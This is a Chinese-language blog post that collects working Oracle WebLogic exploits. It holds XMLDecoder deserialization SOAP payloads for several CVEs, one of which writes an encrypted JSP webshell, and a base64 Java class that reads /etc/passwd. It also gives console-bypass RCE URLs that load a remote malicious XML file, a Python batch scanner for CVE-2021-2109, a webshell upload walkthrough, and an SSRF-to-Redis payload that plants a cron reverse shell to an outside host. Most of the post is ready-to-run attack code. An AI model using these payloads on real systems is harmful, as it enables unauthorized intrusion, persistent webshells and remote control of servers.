一、通过Javabean XML方式发送反序列化数据

1.1 CVE-2017-3506(XMLDecoder反序列化漏洞)

  • 影响版本:WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 版本
  • 漏洞位置:127.0.0.1:7001/wls-wsat/CoordinatorPortType(POST)
  • 影响组件:WSL Security
  • 漏洞原理:使用XMLDecoder来解析用户传入的XML数据,在解析过程中出现反序列化漏洞。
  • 其他可利用URL:
    只要是wls-wsat包中的uri都会受影响,默认收到的如下:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
  • 漏洞利用:
    抓包修改请求方式为POST,修改Content-Typetext/xml
    post内容:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <object class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0"><string>cmd.exe</string></void>
              <void index="1"><string>/c</string></void>
              <void index="2"><string>calc</string></void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

这个xml文件被反序列化将会调用ProcessBuilder类的start方法
(结果会返回500,但实际命令是执行成功的)

  • 漏洞利用(写webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
    <void method="println"><string>
    <![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

这个xml文件被反序列化将会调用PrintWriter类的println方法去写马
然后用冰蝎连接http://192.168.111.131:7001/bea_wls_internal/shell.jsp测试


1.2 CVE-2017-10271(XMLDecoder反序列化漏洞)

  • 漏洞介绍:该漏洞实际上是CVE-2017-3506的绕过,CVE-2017-3506的补丁添加了验证函数,验证Payload中的节点是否存在object标签。将object换成void就可以绕过此补丁,产生了CVE-2017-10271
  • payload:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0"><string>cmd.exe</string></void>
              <void index="1"><string>/c</string></void>
              <void index="2"><string>calc</string></void>
            </array>
          <void method="start"/></void>
        </java>

      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

当然还出现了很多很多变形的payload,不适用void而使用newmethod等标签:

<java version="1.4.0" class="java.beans.XMLDecoder">
    <new class="java.lang.ProcessBuilder">    
        <string>calc.exe</string>
        <method name="start" />
    </new>
</java>

1.3 CVE-2019-2725(XMLDecoder反序列化漏洞)

  • 漏洞介绍:该漏洞核心利用点依旧是weblogic的xmldecoder反序列化漏洞,该漏洞实际上还是CVE-2017-10271补丁的另一个入口和绕过,上一个补丁过滤了名字为object、new、method的元素节点,其次限制了void元素只能使用index属性或者空属性。
  • 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
  • 漏洞位置:127.0.0.1:7001/_async/AsyncResponseService(POST)
  • 影响组件:bea_wls9_async_response.war、wls-wsat.war
  • 漏洞原理:
    1.由于没了method元素,也没了带method属性的void元素,我们就不能指定任意的对象方法。但是class 元素节点同样可以指定任意的反序列化类名。所以我们又可以指定任意类了
    2.在传递参数时我们只能使用空属性或者只带index属性的void元素节点,其次在传入使用数组参数时,array元素的class属性只能为空或者byte。所以我们可以使用oracle.toplink.internal.sessions.UnitOfWorkChangeSet来实现
  • 漏洞利用:

利用ysoserial生成序列化对象转化成字节数组类型后拼接到xml中:

<?xml version="1.0" encoding="utf-8" ?>
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
      xmlns:wsa="http://www.w3.org/2005/08/addressing" 
      xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
      <soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>
      <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
      <class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
      <array class="byte" length="5010">
      <void index="0"><byte>-84</byte></void>
      <void index="1"><byte>-19</byte></void>
      ...
      ...
      ...
      <void index="5007"><byte>120</byte></void>
      <void index="5008"><byte>112</byte></void>
      <void index="5009"><byte>120</byte></void></array> 
      </void></class>
      </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body></soapenv:Body></soapenv:Envelope>

而由于10.2.6.0的自带jdk版本为1.6+,所以可以用jdk7u21 gadget达到RCE。
但是在v12中并没有oracle.toplink.internal.sessions.UnitOfWorkChangeSet这个类,但是可以用org.slf4j.ext.EventData进行二次反序列化

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
<java>
<class><string>org.slf4j.ext.EventData</string>
<void>
<string>
        <java>
            <void class="sun.misc.BASE64Decoder">
                <void method="decodeBuffer" id="byte_arr">  <string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string>
                </void>
            </void>
            <void class="org.mozilla.classfile.DefiningClassLoader">
                <void method="defineClass">
                    <string>ResultBaseExec</string>
                    <object idref="byte_arr"></object>
                    <void method="newInstance">
                        <void method="do_exec" id="result">
                            <string>cat /etc/passwd</string>
                        </void>
                    </void>
                </void>
            </void>
            <void class="java.lang.Thread" method="currentThread">
                <void method="getCurrentWork" id="current_work">
                    <void method="getClass">
                        <void method="getDeclaredField">
                            <string>connectionHandler</string>
                                <void method="setAccessible"><boolean>true</boolean></void>
                            <void method="get">
                                <object idref="current_work"></object>
                                <void method="getServletRequest">
                                    <void method="getResponse">
                                        <void method="getServletOutputStream">
                                            <void method="writeStream">
                                                <object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object>
                                                </void>
                                            <void method="flush"/>
                                            </void>
                                    <void method="getWriter"><void method="write"><string></string></void></void>
                                    </void>
                                </void>
                            </void>
                        </void>
                    </void>
                </void>
            </void>
        </java>
</string>
</void>
</class>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

当然也可以使用一下payload:

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">  
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>  
    <wsa:RelatesTo>xx</wsa:RelatesTo>  
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
      <void class="java.lang.ProcessBuilder"> 
        <array class="java.lang.String" length="3"> 
          <void index="0"> <string>cmd.exe</string></void>  
          <void index="1">  <string>/c</string></void>  
          <void index="2"> <string>calc</string></void> 
        </array>  
        <void method="start"/>
      </void> 
    </work:WorkContext> 
  </soapenv:Header>  
  <soapenv:Body> 
    <asy:onAsyncDelivery/> 
  </soapenv:Body>
</soapenv:Envelope>

返回结果为202

或者直接使用msf获取shell:
exploit(multi/misc/weblogic_deserialize_asyncresponseservice)


1.4 CVE-2019-2729(XMLDecoder反序列化漏洞)

  • 漏洞介绍:与CVE-2019-2725漏洞相似,是CVE-2019-2725的又一个绕过
  • 漏洞原理:
    <class>标签的功能会被标签<array method=”forName”>所替代。因此,使用标签<array method=”forName”>替换<class>标签就可以绕过黑名单。
  • 漏洞利用
    poc:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
     xmlns:wsa="http://www.w3.org/2005/08/addressing
     xmlns:asy="http://www.bea.com/async/AsyncResponseService">
     <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java><array method="forName">'
     <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string>
     <void><array class="byte" length="6006">
     <void index="0"><byte>-84</byte></void>
     <void index="1"><byte>-19</byte></void>
     ...
     ...
     ...
     <void index="6002"><byte>0</byte></void>
     <void index="6003"><byte>126</byte></void>
     <void index="6004"><byte>0</byte></void>
     <void index="6005"><byte>45</byte></void>
     </array></void></array></java>
     </work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/>
     </soapenv:Body></soapenv:Envelope>

在此漏洞公布后,官方也做了修复,这次使用的白名单方法来修复,这是通过新引入的validateFormat()函数和WorkContextFormatInfo中定义的白名单规则来实现的。白名单中仍然是允许<array>标签的,但只允许含有byte值的class属性或含有任意值的length属性。


2.LDAP 远程代码执行漏洞(CVE-2021-2109)

  • 影响版本:WebLogic Server 10.3.6.0.0,12.1.3.0.0,12.2.1.3.0,12.2.1.4.0,14.1.1.0.0
  • 漏洞位置:127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
  • 漏洞利用:
  1. 和上一个漏洞一样,首先使用未授权漏洞进入console:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal
  1. 下载漏洞攻击需要的 LDAP启动脚本并启动:下载链接
  2. 通过未授权访问即可执行命令:
http://localhost:7001/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)

注意:这里 LDAP服务器地址第三个分隔符号为 ;
并且在请求头里添加cmd,值为需要执行的命令,例如:

  • 批量检测poc:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def CVE_2021_2109(target_url, ip):
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    target_url = target_url.strip()
    if not target_url.startswith('http'):
        vuln_url = 'http://' + target_url + f"/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://{'.'.join(ip.split('.')[:3])};{ip.split('.')[-1]}:1389/Basic/WeblogicEcho;AdminServer%22)"
    else:
        vuln_url = target_url + f"/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://{'.'.join(ip.split('.')[:3])};{ip.split('.')[-1]}:1389/Basic/WeblogicEcho;AdminServer%22)"
    headers = {'cmd': 'cat /etc/passwd'}
    try:
        r = requests.get(vuln_url, headers=headers, verify=False, timeout=5)
        if 'root' in r.text:
            print(f'\033[36m[+] {target_url}  存在CVE-2021-2109漏洞 \033[0m')
        else:
            print(f'\033[31m[x] {target_url}  利用失败 \033[0m')
    except Exception:
        print(f"\033[31m[x] {target_url}  请求超时 \033[0m")


if __name__ == '__main__':
    ip = str(input("\033[35m请输入运行JNDIExploit服务器ip >>> \033[0m"))
    with open('urls.txt')as f:
        ips = f.readlines()
        for i in ips:
            CVE_2021_2109(i, ip)

3.未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

  • 影响版本:Oracle Weblogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
  • 漏洞位置:127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal
  • 漏洞利用:
  1. 首先是未授权访问:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal
  1. 在Weblogic 12.2.1以上版本中,我们可以使用com.tangosol.coherence.mvel2.sh.ShellSession类:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/test%27);%22)
  • 漏洞利用2:
    通杀的方法:
    com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
  1. 首先构造一个恶意xml文件,并能让weblogic可访问到改xml文件
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[touch /tmp/success2]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>
  1. 然后通过以下url,让weblogic加载恶意xml,并执行其中的命令:
http://localhost:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("https://yuaneuro.cn/exp/rce.xml")


4.任意文件上传(CVE-2019-2618)

  • 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
  • 漏洞位置:127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService(POST)
  • 利用条件:需知道用户名和密码
  • 漏洞利用:
  1. 首先登录后台,勾选启用 Web 服务测试页并保存
  2. 访问http://localhost:7001/ws_utc/config.do,设置Work Home Dir为:
    /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
    (访问这个目录是无需权限的,这一点很重要。)
  3. 然后点击安全 -> 增加,然后上传webshell:

    并且记录上传的时间戳。
  4. 然后访问http://localhost:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell:

5.SSRF漏洞(CVE-2014-4210)

  • 影响版本:weblogic 10.0.2 -- 10.3.6.0
  • 漏洞位置:127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
  • 漏洞利用:
    漏洞利用
    在此处随便输入东西后点search后抓包,
    抓包
    红框处位置存在ssrf漏洞,

例如修改为127.0.0.1:7001的回显:

7001
修改为不存在的端口例如8888的回显:
8888

  • 漏洞利用2:
    结合 %0a%0d来注入换行符 和redis反弹shell
xxx
set asd "\n\n* * * * *  sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx

将上列命令进行url编码

poc:

http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx

去redis服务器看一眼

没问题,计划任务写进去了

过一会shell也反弹回来了


Last modification:June 10th, 2021 at 10:21 pm
如果觉得我的文章对你有用,请随意赞赏